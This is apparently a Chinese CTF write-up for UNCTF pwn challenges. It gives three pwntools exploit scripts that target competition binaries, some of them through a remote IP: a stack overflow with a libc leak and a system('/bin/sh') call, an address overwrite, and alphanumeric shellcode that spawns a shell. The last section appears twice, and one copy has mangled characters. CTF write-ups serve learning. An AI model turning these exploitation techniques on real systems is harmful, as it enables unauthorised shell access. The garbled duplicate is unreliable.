UNCTF pwn

简单的一道栈溢出题目先泄露libc然后使用gadgetgetshell
Exp如下:

#name:doudoudedi
#coding:utf-8
from pwn import *
from LibcSearcher import *
def debug():
	gdb.attach(p)
#p=process('./pwn4')
p=remote('101.71.29.5',10041)
elf=ELF('./pwn4')
main=0x08048592
pop_edx=0x080483b5
p.recvuntil('!')
payload='a'*0x20+'ffff'
p.sendline(payload)
payload='a'*20+p32(elf.plt['puts'])+p32(main)+p32(elf.got['puts'])
p.recvuntil('name?')
p.sendline(payload)
put_addr=u32(p.recvuntil('\xf7')[-4:])
log.success('put_addr: '+hex(put_addr))
libc=LibcSearcher('puts',put_addr)
libcbase=put_addr-libc.dump('puts')
system_addr=libcbase+libc.dump('system')
bin_sh=libcbase+libc.dump('str_bin_sh')
#debug()
payload='a'*0x20+'ffff'
p.sendline(payload)
p.recvuntil('name?')
payload='a'*(0x10+0x4)+p32(pop_edx)+p32(0)+p32(system_addr)+p32(0xdeadbeef)+p32(bin_sh)
p.sendline(payload)
p.interactive()

2.So_so_easy_pwn
也是常规的题目估计是公用了一个栈空间call eax(这个忘记了)然后开启随机化我们将第四位自己设置即可
Exp:

Exp:
#name:doudouddi
#coding:utf-8
from pwn import *
#p=process('./pwn')
p=remote('101.71.29.5',10000)
libc=ELF('./x86_libc.so.6')
elf=ELF('./pwn')
system_offset=elf.symbols['system']
bin_sh_of=0x0B68
def debug():
	gdb.attach(p)
p.recvuntil('the ')
ads=(int(p.recvuntil(' ',drop=True)[-6:])<<16)+0x1000
flag_addr=ads+0x09D6
#log.success('bin_sh: '+hex(bin_sh))
p.recvuntil('name?')
payload='a'*12+p32(flag_addr)
print len(payload)
log.success('ads: '+hex(ads))
#debug()
p.send(payload)
p.recvuntil(':')
p.sendline('1')
p.interactive()

3easy_shellcode
if ( (s[i] <= 64 || s[i] > 90) && (s[i] <= 96 || s[i] > 122) && (s[i] <= 47 || s[i] > 57) && s[i] != 10 && s[i] )
告诉我们只能传数字字母将写入shellcode我们用师傅写的工具将amd64的shellcode转为纯字母
和数字即可
Exp:
#name:doudoudedi
#coding:utf-8
from pwn import *
from ae64 import AE64
p=process(’./pwn3’)
context.arch=‘amd64’
def debug():
gdb.attach§
p.recvuntil(‘say?’)
debug()
obj=AE64()
payload=obj.encode(asm(shellcraft.sh()))
log.success('shellcode: '+str(payload))
p.sendline(payload)

p.interactive()

if ( (s[i] <= 64 || s[i] > 90) && (s[i] <= 96 || s[i] > 122) && (s[i] <= 47 || s[i] > 57) && s[i] != 10 && s[i] )
告诉我们只能传数字字母将写入shellcode我们用师傅写的工具将amd64的shellcode转为纯字母
和数字即可

Exp:
#name:doudoudedi
#coding:utf-8
from pwn import *
from ae64 import AE64
p=process('./pwn3')
context.arch='amd64'
def debug():
	gdb.attach(p)
p.recvuntil('say?')
debug()
obj=AE64()
payload=obj.encode(asm(shellcraft.sh()))
log.success('shellcode: '+str(payload))
p.sendline(payload)


p.interactive()